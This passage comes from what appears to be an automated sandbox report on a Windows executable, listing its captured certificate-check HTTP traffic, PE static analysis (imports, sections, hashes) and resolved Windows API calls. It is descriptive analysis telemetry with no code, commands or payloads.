  790. "user-agent": "Microsoft-CryptoAPI/6.1",
  791. "method": "GET",
  792. "host": "ocsp.usertrust.com",
  793. "version": "1.1",
  794. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
  795. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D HTTP/1.1\r\nCache-Control: max-age = 94765\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.usertrust.com\r\n\r\n",
  796. "port": 80
  797. },
  798. {
  799. "count": 1,
  800. "body": "",
  801. "uri": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
  802. "user-agent": "Microsoft-CryptoAPI/6.1",
  803. "method": "GET",
  804. "host": "th.symcd.com",
  805. "version": "1.1",
  806. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
  807. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D HTTP/1.1\r\nCache-Control: max-age = 386377\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 21 Mar 2019 05:58:32 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: th.symcd.com\r\n\r\n",
  808. "port": 80
  809. },
  810. {
  811. "count": 1,
  812. "body": "",
  813. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
  814. "user-agent": "Microsoft-CryptoAPI/6.1",
  815. "method": "GET",
  816. "host": "ocsp.digicert.com",
  817. "version": "1.1",
  818. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
  819. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D HTTP/1.1\r\nCache-Control: max-age = 142986\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 07:40:28 GMT\r\nIf-None-Match: \"5cece5ec-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  820. "port": 80
  821. },
  822. {
  823. "count": 1,
  824. "body": "",
  825. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
  826. "user-agent": "Microsoft-CryptoAPI/6.1",
  827. "method": "GET",
  828. "host": "ocsp.digicert.com",
  829. "version": "1.1",
  830. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
  831. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D HTTP/1.1\r\nCache-Control: max-age = 161796\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 13:00:33 GMT\r\nIf-None-Match: \"5ced30f1-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  832. "port": 80
  833. },
  834. {
  835. "count": 1,
  836. "body": "",
  837. "uri": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
  838. "user-agent": "Microsoft-CryptoAPI/6.1",
  839. "method": "GET",
  840. "host": "ocsp.pki.goog",
  841. "version": "1.1",
  842. "path": "/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
  843. "data": "GET /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  844. "port": 80
  845. },
  846. {
  847. "count": 1,
  848. "body": "",
  849. "uri": "http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl",
  850. "user-agent": "Microsoft-CryptoAPI/6.1",
  851. "method": "GET",
  852. "host": "crl.microsoft.com",
  853. "version": "1.1",
  854. "path": "/pki/crl/products/microsoftrootcert.crl",
  855. "data": "GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 07 Mar 2019 06:00:16 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
  856. "port": 80
  857. },
  858. {
  859. "count": 1,
  860. "body": "",
  861. "uri": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
  862. "user-agent": "Microsoft BITS/7.5",
  863. "method": "HEAD",
  864. "host": "redirector.gvt1.com",
  865. "version": "1.1",
  866. "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
  867. "data": "HEAD /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: redirector.gvt1.com\r\n\r\n",
  868. "port": 80
  869. }
  870. ]
  871.  
  872. [*] Network Communication - SMTP: []
  873.  
  874. [*] Network Communication - Hosts: []
  875.  
  876. [*] Network Communication - IRC: []
  877.  
  878. [*] Static Analysis: {
  879. "pe": {
  880. "peid_signatures": null,
  881. "imports": [
  882. {
  883. "imports": [
  884. {
  885. "name": "GetCurrentThread",
  886. "address": "0x40a014"
  887. },
  888. {
  889. "name": "GetOEMCP",
  890. "address": "0x40a018"
  891. },
  892. {
  893. "name": "GetTickCount",
  894. "address": "0x40a01c"
  895. },
  896. {
  897. "name": "GetProcAddress",
  898. "address": "0x40a020"
  899. },
  900. {
  901. "name": "LoadLibraryA",
  902. "address": "0x40a024"
  903. },
  904. {
  905. "name": "GetLastError",
  906. "address": "0x40a028"
  907. },
  908. {
  909. "name": "GetCommandLineW",
  910. "address": "0x40a02c"
  911. },
  912. {
  913. "name": "GetProcessHeap",
  914. "address": "0x40a030"
  915. },
  916. {
  917. "name": "InterlockedIncrement",
  918. "address": "0x40a034"
  919. },
  920. {
  921. "name": "lstrlenA",
  922. "address": "0x40a038"
  923. },
  924. {
  925. "name": "GetVersionExA",
  926. "address": "0x40a03c"
  927. },
  928. {
  929. "name": "GetVersionExW",
  930. "address": "0x40a040"
  931. },
  932. {
  933. "name": "InterlockedDecrement",
  934. "address": "0x40a044"
  935. },
  936. {
  937. "name": "GetCommandLineA",
  938. "address": "0x40a048"
  939. },
  940. {
  941. "name": "VirtualAllocEx",
  942. "address": "0x40a04c"
  943. },
  944. {
  945. "name": "GetCurrentProcess",
  946. "address": "0x40a050"
  947. },
  948. {
  949. "name": "GetModuleHandleA",
  950. "address": "0x40a054"
  951. },
  952. {
  953. "name": "GetStartupInfoW",
  954. "address": "0x40a058"
  955. }
  956. ],
  957. "dll": "KERNEL32.dll"
  958. },
  959. {
  960. "imports": [
  961. {
  962. "name": "DefWindowProcW",
  963. "address": "0x40a068"
  964. },
  965. {
  966. "name": "LoadStringW",
  967. "address": "0x40a06c"
  968. },
  969. {
  970. "name": "SetActiveWindow",
  971. "address": "0x40a070"
  972. },
  973. {
  974. "name": "ReleaseCapture",
  975. "address": "0x40a074"
  976. },
  977. {
  978. "name": "CreateWindowExA",
  979. "address": "0x40a078"
  980. },
  981. {
  982. "name": "GetMenuStringW",
  983. "address": "0x40a07c"
  984. },
  985. {
  986. "name": "UnregisterClassA",
  987. "address": "0x40a080"
  988. },
  989. {
  990. "name": "DestroyWindow",
  991. "address": "0x40a084"
  992. },
  993. {
  994. "name": "RegisterClassW",
  995. "address": "0x40a088"
  996. },
  997. {
  998. "name": "SendMessageW",
  999. "address": "0x40a08c"
  1000. },
  1001. {
  1002. "name": "CreateWindowExW",
  1003. "address": "0x40a090"
  1004. },
  1005. {
  1006. "name": "SetWindowLongW",
  1007. "address": "0x40a094"
  1008. },
  1009. {
  1010. "name": "LoadIconA",
  1011. "address": "0x40a098"
  1012. }
  1013. ],
  1014. "dll": "USER32.dll"
  1015. },
  1016. {
  1017. "imports": [
  1018. {
  1019. "name": "RegOpenKeyExW",
  1020. "address": "0x40a000"
  1021. },
  1022. {
  1023. "name": "RegOpenKeyExA",
  1024. "address": "0x40a004"
  1025. }
  1026. ],
  1027. "dll": "ADVAPI32.dll"
  1028. },
  1029. {
  1030. "imports": [
  1031. {
  1032. "name": "ImageList_Add",
  1033. "address": "0x40a00c"
  1034. }
  1035. ],
  1036. "dll": "COMCTL32.dll"
  1037. },
  1038. {
  1039. "imports": [
  1040. {
  1041. "name": "SetupDecompressOrCopyFileA",
  1042. "address": "0x40a060"
  1043. }
  1044. ],
  1045. "dll": "SETUPAPI.dll"
  1046. },
  1047. {
  1048. "imports": [
  1049. {
  1050. "name": "_exit",
  1051. "address": "0x40a0a0"
  1052. },
  1053. {
  1054. "name": "_c_exit",
  1055. "address": "0x40a0a4"
  1056. },
  1057. {
  1058. "name": "_cexit",
  1059. "address": "0x40a0a8"
  1060. },
  1061. {
  1062. "name": "exit",
  1063. "address": "0x40a0ac"
  1064. },
  1065. {
  1066. "name": "_wcmdln",
  1067. "address": "0x40a0b0"
  1068. },
  1069. {
  1070. "name": "__wgetmainargs",
  1071. "address": "0x40a0b4"
  1072. },
  1073. {
  1074. "name": "_initterm",
  1075. "address": "0x40a0b8"
  1076. },
  1077. {
  1078. "name": "__setusermatherr",
  1079. "address": "0x40a0bc"
  1080. },
  1081. {
  1082. "name": "_adjust_fdiv",
  1083. "address": "0x40a0c0"
  1084. },
  1085. {
  1086. "name": "__p__commode",
  1087. "address": "0x40a0c4"
  1088. },
  1089. {
  1090. "name": "__p__fmode",
  1091. "address": "0x40a0c8"
  1092. },
  1093. {
  1094. "name": "__set_app_type",
  1095. "address": "0x40a0cc"
  1096. },
  1097. {
  1098. "name": "_controlfp",
  1099. "address": "0x40a0d0"
  1100. },
  1101. {
  1102. "name": "__dllonexit",
  1103. "address": "0x40a0d4"
  1104. },
  1105. {
  1106. "name": "_onexit",
  1107. "address": "0x40a0d8"
  1108. },
  1109. {
  1110. "name": "_except_handler3",
  1111. "address": "0x40a0dc"
  1112. },
  1113. {
  1114. "name": "_XcptFilter",
  1115. "address": "0x40a0e0"
  1116. }
  1117. ],
  1118. "dll": "msvcrt.dll"
  1119. }
  1120. ],
  1121. "digital_signers": null,
  1122. "exported_dll_name": null,
  1123. "actual_checksum": "0x0002d30a",
  1124. "overlay": {
  1125. "size": "0x00001f00",
  1126. "offset": "0x00025000"
  1127. },
  1128. "imagebase": "0x00400000",
  1129. "reported_checksum": "0x0002d30a",
  1130. "icon_hash": null,
  1131. "entrypoint": "0x004083d6",
  1132. "timestamp": "2019-06-12 20:02:55",
  1133. "osversion": "4.0",
  1134. "sections": [
  1135. {
  1136. "name": ".text",
  1137. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1138. "virtual_address": "0x00001000",
  1139. "size_of_data": "0x00008000",
  1140. "entropy": "5.82",
  1141. "raw_address": "0x00001000",
  1142. "virtual_size": "0x000076b6",
  1143. "characteristics_raw": "0xf0000020"
  1144. },
  1145. {
  1146. "name": ".bss",
  1147. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1148. "virtual_address": "0x00009000",
  1149. "size_of_data": "0x00000000",
  1150. "entropy": "0.00",
  1151. "raw_address": "0x00000000",
  1152. "virtual_size": "0x00000030",
  1153. "characteristics_raw": "0xc0000080"
  1154. },
  1155. {
  1156. "name": ".rdata",
  1157. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1158. "virtual_address": "0x0000a000",
  1159. "size_of_data": "0x00001000",
  1160. "entropy": "2.39",
  1161. "raw_address": "0x00009000",
  1162. "virtual_size": "0x0000061c",
  1163. "characteristics_raw": "0x40000040"
  1164. },
  1165. {
  1166. "name": ".data",
  1167. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1168. "virtual_address": "0x0000b000",
  1169. "size_of_data": "0x0001a000",
  1170. "entropy": "6.12",
  1171. "raw_address": "0x0000a000",
  1172. "virtual_size": "0x00019d54",
  1173. "characteristics_raw": "0xd0000040"
  1174. },
  1175. {
  1176. "name": ".reloc",
  1177. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1178. "virtual_address": "0x00025000",
  1179. "size_of_data": "0x00001000",
  1180. "entropy": "0.68",
  1181. "raw_address": "0x00024000",
  1182. "virtual_size": "0x0000025c",
  1183. "characteristics_raw": "0x42000040"
  1184. }
  1185. ],
  1186. "resources": [],
  1187. "dirents": [
  1188. {
  1189. "virtual_address": "0x00000000",
  1190. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1191. "size": "0x00000000"
  1192. },
  1193. {
  1194. "virtual_address": "0x0000a104",
  1195. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1196. "size": "0x0000008c"
  1197. },
  1198. {
  1199. "virtual_address": "0x00000000",
  1200. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1201. "size": "0x00000000"
  1202. },
  1203. {
  1204. "virtual_address": "0x00000000",
  1205. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1206. "size": "0x00000000"
  1207. },
  1208. {
  1209. "virtual_address": "0x00025000",
  1210. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1211. "size": "0x00001f00"
  1212. },
  1213. {
  1214. "virtual_address": "0x00025000",
  1215. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1216. "size": "0x00000118"
  1217. },
  1218. {
  1219. "virtual_address": "0x00000000",
  1220. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1221. "size": "0x00000000"
  1222. },
  1223. {
  1224. "virtual_address": "0x00000000",
  1225. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1226. "size": "0x00000000"
  1227. },
  1228. {
  1229. "virtual_address": "0x00000000",
  1230. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1231. "size": "0x00000000"
  1232. },
  1233. {
  1234. "virtual_address": "0x00000000",
  1235. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1236. "size": "0x00000000"
  1237. },
  1238. {
  1239. "virtual_address": "0x00000000",
  1240. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1241. "size": "0x00000000"
  1242. },
  1243. {
  1244. "virtual_address": "0x00000000",
  1245. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1246. "size": "0x00000000"
  1247. },
  1248. {
  1249. "virtual_address": "0x0000a000",
  1250. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1251. "size": "0x000000e8"
  1252. },
  1253. {
  1254. "virtual_address": "0x00000000",
  1255. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1256. "size": "0x00000000"
  1257. },
  1258. {
  1259. "virtual_address": "0x00000000",
  1260. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1261. "size": "0x00000000"
  1262. },
  1263. {
  1264. "virtual_address": "0x00000000",
  1265. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1266. "size": "0x00000000"
  1267. }
  1268. ],
  1269. "exports": [],
  1270. "guest_signers": {},
  1271. "imphash": "7e4334085562a74ad98ab8806ba673ef",
  1272. "icon_fuzzy": null,
  1273. "icon": null,
  1274. "pdbpath": null,
  1275. "imported_dll_count": 6,
  1276. "versioninfo": []
  1277. }
  1278. }
  1279.  
  1280. [*] Resolved APIs: [
  1281. "user32.dll.GetWindowContextHelpId",
  1282. "kernel32.dll.VirtualAlloc",
  1283. "kernel32.dll.VirtualProtect",
  1284. "kernel32.dll.LoadLibraryA",
  1285. "kernel32.dll.VirtualFree",
  1286. "kernel32.dll.VirtualQuery",
  1287. "kernel32.dll.GetConsoleCP",
  1288. "kernel32.dll.CreatePipe",
  1289. "kernel32.dll.ExpandEnvironmentStringsA",
  1290. "kernel32.dll.SetErrorMode",
  1291. "kernel32.dll.SetFilePointer",
  1292. "kernel32.dll.SetEndOfFile",
  1293. "kernel32.dll.lstrlenA",
  1294. "kernel32.dll.GetEnvironmentVariableA",
  1295. "kernel32.dll.WaitForSingleObject",
  1296. "kernel32.dll.GetCurrentThreadId",
  1297. "kernel32.dll.lstrcmpA",
  1298. "kernel32.dll.GetVersionExW",
  1299. "kernel32.dll.ReleaseMutex",
  1300. "kernel32.dll.DuplicateHandle",
  1301. "kernel32.dll.lstrcatA",
  1302. "kernel32.dll.ExitThread",
  1303. "kernel32.dll.GetModuleHandleA",
  1304. "kernel32.dll.GetACP",
  1305. "kernel32.dll.OpenProcess",
  1306. "kernel32.dll.Sleep",
  1307. "kernel32.dll.GetFileInformationByHandle",
  1308. "kernel32.dll.GetLastError",
  1309. "kernel32.dll.OutputDebugStringW",
  1310. "kernel32.dll.CreateFileA",
  1311. "kernel32.dll.GetCurrentThread",
  1312. "kernel32.dll.DeleteFileA",
  1313. "kernel32.dll.GlobalAlloc",
  1314. "kernel32.dll.lstrcpyA",
  1315. "kernel32.dll.CloseHandle",
  1316. "kernel32.dll.ResetEvent",
  1317. "kernel32.dll.GetLocalTime",
  1318. "kernel32.dll.GetProcAddress",
  1319. "kernel32.dll.CreateFileMappingA",
  1320. "kernel32.dll.GetFileSize",
  1321. "kernel32.dll.DeleteCriticalSection",
  1322. "kernel32.dll.ExitProcess",
  1323. "kernel32.dll.LCMapStringW",
  1324. "kernel32.dll.lstrcpynA",
  1325. "kernel32.dll.InterlockedDecrement",
  1326. "kernel32.dll.AddConsoleAliasW",
  1327. "kernel32.dll.SystemTimeToFileTime",
  1328. "kernel32.dll.GetModuleHandleW",
  1329. "kernel32.dll.CreateProcessA",
  1330. "kernel32.dll.AddAtomW",
  1331. "kernel32.dll.CreateDirectoryA",
  1332. "kernel32.dll.OpenMutexW",
  1333. "kernel32.dll.LocalShrink",
  1334. "kernel32.dll.IsDebuggerPresent",
  1335. "kernel32.dll.FlushFileBuffers",
  1336. "kernel32.dll.CreateFileW",
  1337. "kernel32.dll.WriteConsoleW",
  1338. "kernel32.dll.SetFilePointerEx",
  1339. "kernel32.dll.HeapReAlloc",
  1340. "kernel32.dll.HeapSize",
  1341. "kernel32.dll.GetConsoleMode",
  1342. "kernel32.dll.GetProcessHeap",
  1343. "kernel32.dll.GetStringTypeW",
  1344. "kernel32.dll.SetStdHandle",
  1345. "kernel32.dll.FreeEnvironmentStringsW",
  1346. "kernel32.dll.GetEnvironmentStringsW",
  1347. "kernel32.dll.GetCommandLineA",
  1348. "kernel32.dll.GetCPInfo",
  1349. "kernel32.dll.GetOEMCP",
  1350. "kernel32.dll.IsValidCodePage",
  1351. "kernel32.dll.FindNextFileA",
  1352. "kernel32.dll.FindFirstFileExA",
  1353. "kernel32.dll.FindClose",
  1354. "kernel32.dll.DeviceIoControl",
  1355. "kernel32.dll.OutputDebugStringA",
  1356. "kernel32.dll.WriteConsoleA",
  1357. "kernel32.dll.GetShortPathNameA",
  1358. "kernel32.dll.GetStdHandle",
  1359. "kernel32.dll.GetCurrentProcess",
  1360. "kernel32.dll.GetCommandLineW",
  1361. "kernel32.dll.SetLastError",
  1362. "kernel32.dll.EraseTape",
  1363. "kernel32.dll.GetFileType",
  1364. "kernel32.dll.HeapCreate",
  1365. "kernel32.dll.GetFileSizeEx",
  1366. "kernel32.dll.GlobalGetAtomNameA",
  1367. "kernel32.dll.GetModuleFileNameA",
  1368. "kernel32.dll.ReadFile",
  1369. "kernel32.dll.HeapAlloc",
  1370. "kernel32.dll.HeapFree",
  1371. "kernel32.dll.GetModuleHandleExW",
  1372. "kernel32.dll.WideCharToMultiByte",
  1373. "kernel32.dll.MultiByteToWideChar",
  1374. "kernel32.dll.WriteFile",
  1375. "kernel32.dll.LoadLibraryExW",
  1376. "kernel32.dll.FreeLibrary",
  1377. "kernel32.dll.TlsFree",
  1378. "kernel32.dll.LocalFree",
  1379. "kernel32.dll.QueryPerformanceCounter",
  1380. "kernel32.dll.GetCurrentProcessId",
  1381. "kernel32.dll.GetSystemTimeAsFileTime",
  1382. "kernel32.dll.InitializeSListHead",
  1383. "kernel32.dll.UnhandledExceptionFilter",
  1384. "kernel32.dll.SetUnhandledExceptionFilter",
  1385. "kernel32.dll.GetStartupInfoW",
  1386. "kernel32.dll.IsProcessorFeaturePresent",
  1387. "kernel32.dll.TerminateProcess",
  1388. "kernel32.dll.RaiseException",
  1389. "kernel32.dll.RtlUnwind",
  1390. "kernel32.dll.EnterCriticalSection",
  1391. "kernel32.dll.LeaveCriticalSection",
  1392. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
  1393. "kernel32.dll.TlsAlloc",
  1394. "kernel32.dll.TlsGetValue",
  1395. "kernel32.dll.TlsSetValue",
  1396. "user32.dll.TranslateMessage",
  1397. "user32.dll.BeginPaint",
  1398. "user32.dll.ChildWindowFromPoint",
  1399. "user32.dll.LoadImageW",
  1400. "user32.dll.UnhookWinEvent",
  1401. "user32.dll.GetMenu",
  1402. "user32.dll.GetFocus",
  1403. "user32.dll.GetMenuItemCount",
  1404. "user32.dll.DrawIcon",
  1405. "user32.dll.RegisterClassExA",
  1406. "user32.dll.TrackPopupMenu",
  1407. "user32.dll.wsprintfA",
  1408. "user32.dll.DialogBoxIndirectParamA",
  1409. "user32.dll.IsChild",
  1410. "user32.dll.LoadAcceleratorsA",
  1411. "user32.dll.CharNextW",
  1412. "user32.dll.LoadAcceleratorsW",
  1413. "user32.dll.GetClipboardData",
  1414. "user32.dll.OemToCharA",
  1415. "user32.dll.LoadCursorW",
  1416. "user32.dll.SetDlgItemTextA",
  1417. "user32.dll.wsprintfW",
  1418. "user32.dll.CheckDlgButton",
  1419. "user32.dll.GetDesktopWindow",
  1420. "gdi32.dll.CreateFontA",
  1421. "gdi32.dll.StartDocA",
  1422. "gdi32.dll.CreateDCW",
  1423. "gdi32.dll.SetWindowExtEx",
  1424. "gdi32.dll.SetViewportExtEx",
  1425. "gdi32.dll.CreateMetaFileA",
  1426. "gdi32.dll.TextOutA",
  1427. "gdi32.dll.SetMapMode",
  1428. "gdi32.dll.SetTextColor",
  1429. "winspool.drv.GetPrinterA",
  1430. "advapi32.dll.RegCloseKey",
  1431. "advapi32.dll.RegFlushKey",
  1432. "advapi32.dll.RegSetValueExW",
  1433. "advapi32.dll.GetUserNameW",
  1434. "advapi32.dll.RegOpenKeyW",
  1435. "shell32.dll.ShellExecuteA",
  1436. "shell32.dll.SHGetSpecialFolderPathA",
  1437. "ole32.dll.CoCreateInstance",
  1438. "ole32.dll.CoUninitialize",
  1439. "ole32.dll.CoCreateGuid",
  1440. "ole32.dll.CoInitializeSecurity",
  1441. "ole32.dll.CoInitializeEx",
  1442. "ole32.dll.CoInitialize",
  1443. "oleaut32.dll.#8",
  1444. "oleaut32.dll.#6",
  1445. "oleaut32.dll.#2",
  1446. "oleaut32.dll.#9",
  1447. "shlwapi.dll.StrStrA",
  1448. "kernel32.dll.InitializeCriticalSectionEx",
  1449. "kernel32.dll.FlsAlloc",
  1450. "kernel32.dll.FlsSetValue",
  1451. "kernel32.dll.FlsGetValue",
  1452. "kernel32.dll.LCMapStringEx",
  1453. "kernel32.dll.SortGetHandle",
  1454. "kernel32.dll.SortCloseHandle",
  1455. "ole32.dll.OleInitialize",
  1456. "cryptbase.dll.SystemFunction036",
  1457. "uxtheme.dll.ThemeInitApiHook",
  1458. "user32.dll.IsProcessDPIAware",
  1459. "ole32.dll.CreateBindCtx",
  1460. "ole32.dll.CoTaskMemAlloc",
  1461. "propsys.dll.PSCreateMemoryPropertyStore",
  1462. "propsys.dll.PSPropertyBag_WriteDWORD",
  1463. "ole32.dll.CoGetApartmentType",
  1464. "ole32.dll.CoRegisterInitializeSpy",
  1465. "ole32.dll.CoTaskMemFree",
  1466. "comctl32.dll.#236",
  1467. "ole32.dll.CoGetMalloc",
  1468. "propsys.dll.PSPropertyBag_ReadDWORD",
  1469. "propsys.dll.PSPropertyBag_ReadGUID",
  1470. "comctl32.dll.#320",
  1471. "comctl32.dll.#324",
  1472. "comctl32.dll.#323",
  1473. "advapi32.dll.RegEnumKeyW",
  1474. "advapi32.dll.OpenThreadToken",
  1475. "apphelp.dll.ApphelpCheckShellObject",
  1476. "urlmon.dll.CreateUri",
  1477. "kernel32.dll.InitializeSRWLock",
  1478. "kernel32.dll.AcquireSRWLockExclusive",
  1479. "kernel32.dll.AcquireSRWLockShared",
  1480. "kernel32.dll.ReleaseSRWLockExclusive",
  1481. "kernel32.dll.ReleaseSRWLockShared",
  1482. "comctl32.dll.#328",
  1483. "comctl32.dll.#334",
  1484. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
  1485. "shell32.dll.#102",
  1486. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
  1487. "propsys.dll.PSPropertyBag_ReadStrAlloc",
  1488. "comctl32.dll.#332",
  1489. "advapi32.dll.InitializeSecurityDescriptor",
  1490. "advapi32.dll.SetEntriesInAclW",
  1491. "ntmarta.dll.GetMartaExtensionInterface",
  1492. "advapi32.dll.SetSecurityDescriptorDacl",
  1493. "comctl32.dll.#386",
  1494. "advapi32.dll.IsTextUnicode",
  1495. "comctl32.dll.#338",
  1496. "sechost.dll.ConvertSidToStringSidW",
  1497. "propsys.dll.#430",
  1498. "advapi32.dll.RegOpenKeyExW",
  1499. "advapi32.dll.RegGetValueW",
  1500. "ole32.dll.CoTaskMemRealloc",
  1501. "propsys.dll.InitPropVariantFromStringAsVector",
  1502. "propsys.dll.PSCoerceToCanonicalValue",
  1503. "propsys.dll.PropVariantToStringAlloc",
  1504. "ole32.dll.PropVariantClear",
  1505. "ole32.dll.CoAllowSetForegroundWindow",
  1506. "shell32.dll.SHGetFolderPathW",
  1507. "advapi32.dll.SaferGetPolicyInformation",
  1508. "ntdll.dll.RtlDllShutdownInProgress",
  1509. "comctl32.dll.#329",
  1510. "ole32.dll.OleUninitialize",
  1511. "ole32.dll.CoRevokeInitializeSpy",
  1512. "comctl32.dll.#388",
  1513. "oleaut32.dll.#500",
  1514. "wininet.dll.InternetReadFile",
  1515. "rasapi32.dll.RasConnectionNotificationW",
  1516. "sechost.dll.NotifyServiceStatusChangeA",
  1517. "rpcrt4.dll.RpcBindingFree",
  1518. "advapi32.dll.UnregisterTraceGuids",
  1519. "comctl32.dll.#321",
  1520. "cscapi.dll.CscNetApiGetInterface",
  1521. "advapi32.dll.LsaOpenPolicy",
  1522. "advapi32.dll.LsaQueryInformationPolicy",
  1523. "netutils.dll.NetApiBufferAllocate",
  1524. "advapi32.dll.LsaFreeMemory",
  1525. "advapi32.dll.LsaClose",
